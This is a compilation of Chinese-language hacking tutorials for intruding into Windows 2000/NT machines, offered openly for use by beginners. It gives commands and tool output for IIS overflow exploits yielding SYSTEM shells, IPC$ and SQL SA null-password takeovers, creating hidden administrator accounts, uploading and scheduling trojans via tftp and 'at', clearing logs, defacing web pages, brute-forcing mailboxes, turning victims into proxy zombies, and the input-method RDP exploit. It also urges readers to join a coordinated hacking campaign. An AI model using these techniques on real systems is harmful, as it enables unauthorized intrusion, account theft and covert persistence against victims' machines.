(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈,終於上來啦,你現在可是system權限,下面該怎麼做就看你的啦。

(4)IDA溢出漏洞
所用程序:idahack
進入MS-DOS方式(假設idq.exe在c:\下)
c:\idahack.exe
運行參數:c:\idahack
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
Good luck ?;
好,現在你可以telnet它的80端口了,我們用NC來連接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
(C)版權所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK,現在我們現在上來了,也可IDQ一樣是SYSTEN權限,盡情的玩吧。

(5).printer漏洞
這個漏洞,我們用兩個程序來入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,

usage: D:\IIS5HACK.EXE
用法: D:\IIS5HACK <溢出的主機> <主機的端口> <主機的類型> <溢出的端口>
chinese edition:   0
chinese edition, sp1: 1
english edition:   2
english edition, sp1: 3
japanese edition:   4
japanese edition, sp1: 5
korea edition:   6
korea edition, sp1: 7
mexico edition:   8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
good luck

溢出成功!
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK,我們又成功取得system權限!玩吧。

(6)139端口入侵
我們先確定一台存在139端口漏洞的主機。用掃描工具掃描!比如SUPERSCAN這個端口掃描工具。假設現在我們已經得到一台存在139端口漏洞的主機,我們要使用nbtstat -a IP這個命令得到用戶的情況!現在我們要做的是與對方計算機進行共享資源的連接。
用到兩個NET命令,下面就是這兩個命令的使用方法
NET VIEW?
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。?
命令格式:net view [\\computername | /domain[:domainname]?
參數介紹:?
<1>鍵入不帶參數的net view顯示當前域的計算機列表。?
<2>\\computername 指定要查看其共享資源的計算機。?
<3>/domain[:domainname]指定要查看其可用計算機的域?

NET USE?
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]?
[password | *] [/user:[domainname\]username] [/delete] |?
[/persistent:{yes | no]}?
參數介紹:?
鍵入不帶參數的net use列出網絡連接。?
devicename指定要連接到的資源名稱或要斷開的設備名稱。?
\\computername\sharename服務器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。?
domainname指定另一個域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網絡連接。?
/persistent控制永久網絡連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經看到對方共享了他的C,D,E三個盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現在我們已經得到的139端口漏洞的主機IP地址和用戶名,現在就該是我們進入他計算的時候了,點擊開始---查找--計算機,將剛才找到的主機名字輸入到上面,選擇查找,就可以找到這台電腦了!雙擊就可以進入,其使用的方法和網上領居的一樣。

(7)IPC入侵
所有程序:流光
開始:在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。輸入我們要破解的IP段,我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機。在“輔助主機”那裡的“IPC$主機”前面打勾,然後在菜單了選“探測”,,掃描出結果以後,“IPC$主機”,選中後按“CTRL+F9”就開始探測IPC用戶列表。會出現“IPC自動探測”
的窗體,把那兩個選項都選了,然後點“選項” 為了加快弱口令掃描速度,這裡的兩個選項我們可以全部取消記住。然後點“確定”出來後點“是”就開始探測了。一會兒,結果出來了。比如我們探測出了用戶名為“admin”的管理員,密碼為“admin”,現在我們用命令提示符,熟悉下命令吧,輸入:
net use file://對方ip/ipc$ "密碼" /user:"用戶名" || 建立遠程連接
copy icmd.exe file://對方ip/admin$   || admin$是對方的winnt目錄
net time file://對方IP/       || 看看對方的本地時間
at file://對方ip/ 啟動程序的時間 啟動程序名 啟動程序的參數   || 用at命令來定時啟動程序
telnet 對方ip 端口

我們也可以改網頁:
net use \\ip\ipc$ "admin" /uesr:"admin" 回車。
出現“命令成功完成”。
然後輸入“dir \\ip\c$\*.*”
看到C:下所有內容。現在我們來改主頁。一般主頁放在c:\inetpub\wwwroot裡面
輸入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.這些就是主頁了,假如你黑頁在C:下,就輸入"copy 主頁文件 \\ip\c$\inetpub\wwwroot"覆蓋原文件這樣就行了,簡單吧?

日志清除,斷開連接 :
我們copy cl.exe ,clear.exe 上去,再執行,就可以清除日志,比如clear all :清除所有的日志。然後在斷開連接:net use file://ip/ipc$ /delete

(8)超管SA空密碼漏洞
使用的工具:流光IV
啟動流光,按Ctrl+R。出現掃描設置對話框,設置掃描IP段,並且選擇掃描的類型為SQL。點擊“確定”,進行掃描,假設我們取得主機:127.0.0.1,然後點擊“工具” —— SQL遠程命令(或者Ctrl+Q),填入主機IP(127.0.0.1)、用戶(sa)、密碼(空)點擊“連接”,出現遠程命令行的界面。
net user heiying heiying1 /add     填加一個heiying的帳號和密碼heiying1
net localgroup administrators heiying /add 將我們創建的heiying帳號填加到管理組。
下面我們來做跳板:
打開cmd.exe,輸入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
顯示命令成功完成。
上傳srv.exe:
copy srv.exe \\127.0.0.1\admin$\system32
上傳ntlm.exe:
copy ntlm.exe \\127.0.0.1\admin$\system32
啟動服務:
首先用net time \\127.0.0.1
看看對方主機的時間,(假如回顯\\127.0.0.1 的本地時間是上午12.00),然後我們用at \\2127.0.0.1 12.01 srv.exe命令來啟動srv.exe。等一分鐘後就可以telnet了。
一分鐘後在本機命令提示符中輸入:
telnet X.X.X.X 99
然後我們要啟動NTLM.exe:
在telnet狀態下直接輸入ntlm回車。
顯示:windows 2000 telnet dump,by assassin,all rights reserved.done!
然後從新啟動對方主機的telnet服務:net stop telnet(先關閉telnet服務)再輸入net start telnet(啟動telnet服務)然後我們退出telnet,然後在命令行下輸入telnet 127.0.0.1,依照提示,接著輸入用戶名:heiying,密碼:heiying1,回車。這樣,我們的跳板就做好了,簡單吧?
(上面上傳的srv和ntlm等東東還有一個簡便方法,全都可以直接用流光工具菜單裡的種植者上傳,60秒後自動運行,不用敲命令!呵呵~~~~方便吧!)

(9)如何用流光破解信箱密碼
這次的目標是21CN,運行流光IV,選擇POP3主機----右鍵----編輯----添加,填上:pop.21cn.com,其他的就用默認吧!不用更改,確定就行了。到下一步,還是右鍵-----從列表中添加------選擇一個字典,沒有的到網上下載一個字典,或者到黑白網絡去下載,我們用簡單模式探測!這樣速度比較快,然後就等著成果吧,上次我以下就破了5個郵箱出來。

(10)frontpage進行攻擊
打開您自己的Frontpage,文件菜單下選擇“打開站點”,然後在文件夾框裡寫入http://127.0.0.1(http://不要漏掉)。按下“打開”按鈕,一會後,出現了文件夾,成功了,現在就可以操作網頁文件了。如果跳出錯誤信息,表示有密碼,我們用以下http://127.0.0.1/_vti_pvt/service.pwd,這是默認的密碼文件,下載下來,找個解密器破密碼吧!破出來後就還可以改網頁。這個只能改該網頁,沒什麼玩的。

(11)用肉雞做SOCK5代理跳板
需要軟件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
首先我們在命令提示符下建立IPC$管道:
net use \\127.0.0.1\ipc$ "密碼" /user:帳號
通道建立好後,我們把srv.exe sss.exe ntlm.exe全部上傳。
c:\copy srv.exe \\10.10.10.10\admin$
1 files copied!
c:\copy ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\copy sss.exe \\10.10.10.10\admin$
1 files copied!
復制完畢後,
看肉雞上現在的時間:
c:\net time \\127.0.0.1
顯示當前時間是 2002/4/13 晚上 09:00
我們來啟動srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09:01後。我們來連接肉雞:
c:\telnet 127.0.0.1 99
連上後顯示:
c:\winnt\system32>
接著我們啟動NTLM.exe
c:\winnt\system32>ntlm
顯示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我們終止srv.exe的telnet服務:
C:\WINNT\system32>net stop telnet
繼續:
C:\WINNT\system32>net start telnet
再啟動TELNET。
OK,我們來登陸
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了,一切順利,我們現在正式開始做代理:
c:>sss.exe -install <---------開始安裝
顯示:
c:>sksockserver installed!
來看看配置:
c:>sss -config show
顯示:
SkServer Port = 1813   <----開放服務的端口 ,我們記著這個1813端口哦
SkServer StartType: 3 - Manual   <---服務啟動方式
SkServer Enable Client Set Num:0   <---客戶端的項目個數
SkServer Pass SkServer Number:0   <---經過SkServer的項目個數

來啟動服務:
c:>net start skserver
提示你正在啟動,並且完成。
來檢查一下是不是啟動了:
c:>net start         <-----------看看啟動的服務列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它,呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了,到這裡我們已經做好了一個socks5代理了,我們自己的哦.OK,下面我們用sockscap來使用我們做代理。
安裝好SocksCap後,我們在桌面上打開SocksCap V2,點開File選項選Settings...彈出卡片,在 SOCKS Server裡面我們填肉雞的IP:127.0.0.1,PortT填默認的1813端口,下面的我們選socks version 5,呵呵,和 Attempt local then remot,這是域名解析的順序,先本地,然後才遠程。設置完了點“確定”我們就可以使用了,添加應用程序到sockscap裡面,點開那個"new"按鈕,會彈出一個卡片,
Profile name :程序名,隨便寫。
Command Line: 命令行,點後面的Browse...找到你的程序路徑
Working:填好上面那個,這個就自動加上.
這樣我們就把程序加到SocksCap裡面了。
現在們可以雙擊裡面的程序來使用,也可以選住程序在點"Run"來運行。

好了,終於寫完了,上面的內容都很簡單,很適合初學者,還望高手們不好見笑,剛好聽說這次5.1有很多聯盟有所行動,希望上面的內容能教會一部分人,少走彎路,讓更多的人參與這次行動。UNIX和LINUX由於自己的功力也還不夠,還差很遠,所以還不敢寫。


利用WIN2000的輸入法漏洞在別人機子上跳舞
下面我來講講如何利用輸入法漏洞遠程入侵開了終端服務的windows 2000的機器:

首先我們確定某台機器的3389端口是開放的:

D:\\Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx

Starting nmapNT V. 2.53 by [email protected]

eEye Digital Security ( http://www.eEye.com )

based on nmap by [email protected] ( www.insecure.org/nmap/ )

Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):

Port State Service

3389/tcp open msrdp

Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds

D:\TOOLS\nmapNT\Nmapnt>

現在我們已經可以看到這台機器的終端服務是開放的,那麼我們就可以開始行動了。

打開終端服務客戶端,添上IP地址,選擇連接。

稍等片刻,一般是很快的,就會出現熟悉的登陸對話框了,這是我們看看有沒有輸入法的漏洞。有關輸入法的漏洞請參看相關文章。如果有輸入法漏洞那麼我們如何取得控制權呢?經過多次的研究試驗。終於想出了一個辦法。我們發現在跳至url後,我們雙擊winnt目錄下的explorer.exe並沒什麼反應(是機上已經運行了,可是我們為什麼看不到結果呢?),如果我們不斷的進行雙擊,或者什麼也不做,一會兒連接將被斷開,在斷開的一霎那,我們似乎看到了我們雙擊出來的窗口。經過幾次試驗,我們發現不登陸進去是不行的,將會被服務端斷開。於是想辦法先登陸進去,我想到了在幫助中打開用戶管理器,經過試驗,在跳至url中添入:mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm

在右側會出現一個可以打開本地用戶和組的管理器的鏈接,本來在正常情況下是可以打開這個管理器的,

可是在沒有登陸進去的時候就是出不來,於是想另外的辦法。終於想到了建立一個命令行的快捷方式。在跳

至url中輸入:c:\winnt\system32,然後找到net.exe,右鍵點擊net.exe,選擇創建快捷方式,於是創建了

一個文件名為快捷方式net.lnk的文件,然後再右鍵點擊這個快捷方式,選擇屬性,這時我們就可以輸入我們

的命令了。在目標中添入我們要執行的命令的路徑和參數就行了,我們還是用net命令,因此不必改路徑了,

添加個賬號test的命令如下,C:\WINNT\system32\net.exe user test/add。密碼為空。然後雙擊這個快捷方

式運行它。然後我們把這個賬號添加到administrators組中,

C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再運行。我們現在已經基本上成功了,

關掉幫助窗口,用test賬號登陸,密碼為空。進去後我們把剛才建的快捷方式刪掉。然後再將本地用戶的

TSinternetuser賬號加進administrators組中,設置密碼。這樣我們下次就可以用這個賬號進來了。然後

再用這個賬號登陸一下,如果能夠登陸,就刪掉剛剛建立的test賬號。

這台機器就這樣控制在我們的手裡了。。。。。。


方法二:

其過程如下:

1.掃描 3389 port 終端服務默認;

2.用終端客戶端程序進行連接;

3.按ctrl+shift調出全拼輸入法(其他似乎不行),點鼠標右鍵(如果其幫助菜單發灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;

4.在"選項"菜單上點右鍵--->跳轉到URL",輸入:c:\winnt\system32\cmd.exe.(如果不能確定NT系統目錄,則輸入:c:\ 或d:\ ……進行查找確定);

5.選擇"保存到磁盤" 選擇目錄:c:\inetpub\scripts\,因實際上是對方服務器上文件自身的復制操作,所以這個過程很快就會完成;

6.打開IE,輸入:http://ip/scripts/cmd.exe?/c dir 怎麼樣?有cmd.exe文件了吧?這我們就完成了第一步;

7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat

8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat

9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat

10.http://ip/scripts/cmd.exe?/c type go.bat 看看我們的批文件內容是否如下:

net user guest /active:yes

net user guest elise

net localgroup administrators /add guest

11.在"選項"菜單上點右鍵--->跳轉到URL",輸入:c:\inetpub\scripts\go.bat --->在磁盤當前位置執行;

12.呵呵,大功告成啦,這樣我們就激活了服務器的geust帳戶,密碼為:elise,超級用戶呢! (我喜歡guest而不是建立新帳戶,這樣似乎不易被發現些),這樣你就可用IPC$連接,想怎樣做就怎樣做了,當然,你也可用guest直接登陸到他的服務器,到他機器上去跳舞吧:)

 

方法三:

用端口掃瞄程序掃IP的3389端口,得到xx.xx.xx.xx。

  2、運行windows2000終端客戶程序,在服務器輸入框裡填入:xx.xx.xx.xx ,連接。

  3、出現windows2000的登陸窗口,按下CTRL+SHIFT鍵,出現全拼輸入法。

  4、在輸入法狀態條上按mouse右鍵,選擇幫助,選擇輸入指南,選擇"選項"按右鍵。

  5、選擇"跳轉到URL",輸入:c:\winnt\system32\cmd.exe.

  6、選擇"保存到磁盤"。

  7、選擇目錄:c:\inetpub\scripts\

  8、打開IE,輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ (知道了吧)

  9、輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp

10。OK

一次簡單入侵
又是一個休息日,閒得無聊,打開電腦,看了幾大門戶站的八卦新聞,愈看愈覺就得沒勁。做點啥趣事呢?有了!前幾天一OICQ聊友叫我幫忙搞定一主機,一直懶得搞,那麼現在就去找找這主機的晦氣吧。
看看這主機是否是網站先,用IE打開它的IP:61。170。168。168,出現“該頁無法顯示”。看來這主機還沒WEB網頁。祭起我的“X-SCAN”寶刀,全面掃描一下它的各種漏洞,我就不信他沒有漏洞!(玩黑必備一:眼睛長到頭頂上)
X-SCAN掃描結果報告:
“端口開放:1433、3389
ASP 漏洞:don't find CGI漏洞: don't find IIS漏洞don't find……,SQL:SA /NULL”
呵呵,大局已定,大家看到了有哪些漏洞嗎?什麼,你不懂鳥語?哇噻,你先去補習鳥語再到我這來!對了,我們的白靈、流二位大蝦精通由各種亂碼加鳥語組成的火星ASP語言,聽說二位不日將移民火星,你趁他們還在地球快去拜師學藝啊!
再接著賣我的黃婆爛瓜……
3389——我得最愛!利用遠程主機打開的遠程控制功能(通過3389連接)進入它的WINDOWS圖形界面,這種感覺對我等菜鳥來說可不是DOS破界面能比的哦~~
廢話少說,打開我的“WINDOW2000遠程客戶程序”,填IP、點“聯接”~~啊?連不上!再連~~還是不行!55555……輸入法漏洞是玩不成了。
一招不行再換一招!點根煙先……打開“天行網絡”所制的精品軟件——SQLEXEC,填上IP,用戶名:SA,密碼為空,點“連接”---“:(連接成功!”
進來了,談笑間我就進來了,我真厲害~~(玩黑必備二:自誇不怕嚇死人)。先看看它的C盤的文件:DIR C:,OK!這機子裝的是WINNT,怪不得我用WIN2000的遠程客戶程序連不上,可是它怎麼會打開WIN2000的遠程連接用端口-3389端口呢?
算了,越想越亂,忙我的正事吧。
為安全起見,讓我看看它建立了哪些連接進程:“netstat -n”……哈,反饋回來的信息都是一些196開頭的IP,沒開TTY監聽,這該不會是個局域網的服務器吧?
再來看看我現在的權限有多少:“net user aaa 1234 /add”---“成功建立新用戶”。呵呵,權限還不小,能建新用戶哦~~由於我機子用的是WIN98,所以沒法用這新建的用戶名為AAA,密碼為1234的帳戶進行連接,這帳戶對我來說根本
沒用……
現在,我們即將開始取得遠程主機的最最最……大權限!啥?你不信?呵呵,說你菜你還不高興,聽說過木馬嗎?聽說過大名鼎鼎專玩木馬的“符號”大蝦嗎?哦,你不知木馬只知符大蝦……行,趕明兒我讓符大蝦在你機子裡也放個木馬,這樣你就
能深刻理解啥叫木馬了~~
繼續攻擊……我們現在就要上傳個木馬到遠程主機。木馬“廣外女生”現在國內很流行,前幾天也曾去黑網下栽了一個,它的被控端程序才90K,上傳比較容易,就用它做遠程主機的“後門”吧。1。打開TFTP(一個能把你的PC變成FTP服務器的小程序)——
2。把“廣外女生”的被控端程序gw.exe復制到我的C盤TFTP默認文件路徑下。3。在遠程主機裡輸入命令:"tftp -i xx.xx.xx.xx get gw.exe c:\gw.exe"
5分鐘後,GW。EXE已乖乖在躺在遠程主機的C盤裡了~~~
現在,得想法子運行GW。EXE:1。打入命令"net time"---遠程主機反饋當前時間"09:35"。 2.打入程序起動時間命令"at 09:37 c:\gw.exe"(GW在9:37運行)——出現主機反應:“建立一個新任務,ID=1”
OK!二分鐘後將運行我的“廣外女生”了!
打開我的“廣外”控制端程序,在主機查找欄裡填上“61.170.168.160---61.171.168.170”,點“查找”。掃描很慢……別急……掃完了……啊?!在這掃描的IP端裡無中“獎”主機!怪事啊!是遠程主機的“廣外”沒有運行還是我對這控制端程序的操
作錯誤?一定是這破“廣外”本身程序不行,太爛了~~(玩黑必備三:一切都不是我的錯!)。
看來,今天我只得請出封存已久的國貨精品木馬——“冰河”了。我的“冰河2。2”的被控端有200多K,估計上傳時間會很久,但如果上傳成功,它的功能可不是“廣外”所能與之並論的啊!另外,對冰河的界面操作也不會似“廣外”那嚒陌生……
言歸正傳,現在開始上傳“冰河”:“tftp -i xx.xx.xx.xx get G-server.exe c:\inetpub\GG.exe"(為不至於太過醒目,這次把文件傳到C盤的INETPUB文件包下)
緩慢上傳中……讓我再點根煙,趁這功夫去“黑白網絡”的技術論壇逛逛去……
已過25分鐘了,進遠程主機瞧瞧是否已下栽成功了~~OK!冰河已在那裡了。接著:“net time”,反饋信息:10:30”。“at 10:32 c:\inetpub\GG.exe”,反饋信息“運行新任務,ID=1”
二分鐘後,打開“冰河”控制端,加入遠程主機IP,連接……成功!接著再:添加服務器端連接密碼、添加冰河運行自動通知發往信箱、刪除“廣外”、“冰河”被控端程序。
……
現在,這主機的一切已盡在我眼前了,真爽啊!明天,我也許會把一個SOCK5代理的服務器端程序放進這主機,大家以後要是想用SOCK5代理,又懶得去漫無目標的查找的話,請找我,我會把我這個人專用“肉機”貢獻出來的。
遠程CMD下安裝終端服務TS

============================================
記得好多人說過關於CMD下安裝終端的事,但一直沒能成功。但他家都說好使.我現在可以明明白白的告訴大家了!這種方法可行,但是是有條件的!
其條件是:
其計算機要安裝了3389但是沒有啟動!
也就是說,如果對方沒有安裝3389,這種方法是不可能的!
我現在正在研究在CMD下無人安裝終端服務!反復折騰N遍,終於理清了這個安裝需要哪些文件了,見下:
所需文件清單:
BHP001.IN_
BHP005.IN_
BHP006.IN_
BHP007.IN_
BHP008.IN_
BHP013.HL_
BHP015.IN_
BHP017.IN_
BHP018.IN_
BHP024.IN_
BHSUPP.DL_
DEFAULT.AD_
DEFAULT.CF_
DEFAULT.DF_
HEXEDIT.DL_
MCAST.DL_
NETMON.IN_
NETMON2.CH_
NMSUPP.DL_
PARSER.DL_
PARSER.IN_
SLBS.DL_
這個是 W2K ADV SERVER 的文件,對於這個安裝,解壓後的文件沒用,必須要壓縮格式的文件(奇怪),更可氣的是,安裝程序沒有復制任何文件到系統裡(除了TEMP目錄,呵呵),在WINNT目錄下有個文件叫 setupapi.log,從中也可以看出,對上述這些文件的復制全部失敗(文件內容較多,我就不貼了),但安裝卻成功了...這個是從光盤上安裝的,要遠程安裝,總不能電話通知管理員放光盤吧 ,於是把這些文件COPY到SYSTEM32目錄下,再裝,還是彈出對話框。。。由此確定系統中某處肯定保留了最初安裝W2K時的安裝路徑
果然在注冊表中找到了,見下:

Root Key:
HKEY_LOCAL_MACHINE\

Subkey :
SOFTWARE\Microsoft\COM3\Setup
SOFTWARE\Microsoft\MSDTC\Setup
SOFTWARE\Microsoft\Transaction Server\Setup(OCM)
SOFTWARE\Microsoft\Windows\CurrentVersion\Setup

KeyName:
SourcePath

Keyvalue:
F:\SIMPCHIN\WIN2000\ADV_SRV\

注意:Keyvalue 不包含“i386”,安裝時會自動加上這個路徑。

對於 sysocmgr 安裝程序而言,所需要的是 SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
於是,在 D:\ 新建一目錄為 i386 ,把上述文件COPY進去,再把這個注冊表項的值改為 D:\,卸載TS,再安裝TS

最後,再簡單說一下命令行下安裝TS的過程,首先,要感謝 小青豆,是他教我如何遠程修改注冊表的,向他致敬!
先在命令行下建立兩個 answer file,如下:
echo [Components] > c:\aa
echo TSEnable = off >> c:\aa

echo [Components] > c:\bb
echo TSEnable = on >> c:\bb

注:文件 aa 是用來卸載TS的,文件 bb 是用來安裝TS的,路徑隨意,只要和下述命令中的一致即可。

然後鍵入:
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\aa /q
重起完成後,鍵入
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bb /q

注:c:\winnt\.... 這個路徑根據實際情況需更改,如果不希望立刻重起,在 /q 後加上 /r 參數。

再談3389 !
如今都抱怨3389的肉雞不好找了.原來的時候俺也沒玩過! 偶見俺個死黨玩的入迷.沒辦法也來試試.結果現在的進展.. 兩天拿下了三十二台.而且)______ 速度沒有小於十M的,
說說方法吧,你整個聊天室了,或到網上查一下寬帶了,先搞出這個地段寬帶的IP,下面的事就好辦多了,隨便整個掃描器讓其只掃3389端口.現在大部分寬帶的用戶和電信的大哥們都是這個~~125*2
好了利用這點時間我們做一件事,自己有FTP空間的話上傳一個批命令,裡面這樣寫 net user abc abc /add
net localgroup administrators abc /add
以上的意思大家應該都明白吧就是建立一個密碼為ABC的用戶ABC並將其加入到管理員組, 然後另存為1。BAT,傳到你的空間上。
OK我們現在看看掃描結果,登陸到一台機器,輸入法切換,調出幫助文件,空白處點擊鼠標的右健,選“跳至URL”在出來的輸入檔裡打上我們的剛才上傳的1。BAT的地址,***。***。***。***/1。BAT。選擇,在當前打開。OK了現在你可以用ABC賬號登陸他的機器了。登陸以上要做的事:
http://download.microsoft.com/downl..._SP2_x86_CN.EXE先給他打上輸入法補丁
local-machine->software->microsoft->winnt->currentversion->winlogon

DontDisplayLastUserName:1
修改注冊表相應健值,這樣網管就不會查到你了
呵呵
怎樣可以遠程打開對方的3389端口
如果對方的端口有開放:
telnet 192.168.0.1
輸入用戶名/密碼
C:\>
\\成功進入!!!!
進入後,再次檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.

這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1     console   0 運行中 .   2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.

好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s   //檢查INF文件的位置
c:\WINNT\inf 的目錄

2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s   //檢查組件安裝程序
c:\WINNT\system32 的目錄

2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\wawa  
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人參與的安裝參數
c:\>type c:\wawa      
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起.

如果一切正常的話,幾分鐘後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了.

這裡還有兩種方法
第一種開啟的辦法:
使用DameWare Mini Remote Control遠程連接上,
在"終端服務配置"裡,重新啟用RDP連接,馬上就可以使用3389了.
第二種開啟的辦法:
修改遠程注冊表.
比如:
主機IP: 192.168.0.1
已有的帳號和密碼: wawa/7788
首先與遠程主機建立連接
net use \\192.168.0.1\ipc$ "7788" /user:"wawa"
再打開本機注冊表
"開始"==>"運行"==>regedit
在"注冊表"下拉菜單中選擇"連接網絡注冊表"
在"計算機名"中輸入 \\192.168.0.1
這樣就進入了遠程主機注冊表.
現在我們找到這裡:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
將fEnableWinStation值由0改為1

SQLEXEC或telnet進入後,檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.
這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1     console   0 運行中 .   2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.
好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s   //檢查INF文件的位置
c:\WINNT\inf 的目錄

2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s   //檢查組件安裝程序
c:\WINNT\system32 的目錄

2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\wawa  
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人參與的安裝參數
c:\>type c:\wawa      
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起.

如果一切正常的話,幾分鐘後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了.


突破3389

 

不過很多人會有疑問,使用3389當然好了。可是Windows 2000的專業版是沒有3389的功能的,你怎麼開?如果您能夠思考到這一步就說明您已經具有相當的黑客天賦了。Windows 2000的專業版本的確沒有3389的功能,所以在我們在使用MS04-11溢出成功後想要開3389端口作為自己的遠程控制的手段就需要在多費一番功夫了。首先利用MS04-11漏洞溢出之後我們至少可以使用Telnet之類的服務,如果你直接輸入Ver命令只能夠看到它Windows的補丁版本號,是無法看到具體的系統版本號馬的,因此我們必須通過使用type這個命令打開系統中的Boot.ini文件判斷一下作系統的Windows版本,在Boot.ini中的最後會顯示:

[boot loader]

timeout=5

default=multi(0)disk(0)rdisk(0)partition(1)\WINNT

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Professional" /fastdetect /noguiboot

我們可以輕松的判斷出該作系統應該是Windows 2000 Professional。在確定是Professional版本後,不過不要傷心Windows 2000 Professional一樣可以通過手段讓其打開3389服務。其實Windows 2000中,無論任何一個版本,它們的多數程序都是一樣的,Server版本的Windows 2000和Professional的更為相似,它們的唯一不同僅僅局限在注冊表上,我們只要在Professional的注冊表中動一些手腳就可以讓Professional變成Server。3am Laboratories公司制作的NTSwitch就是一個可以讓Windows 2000 Professional變成Server版本的好工具。

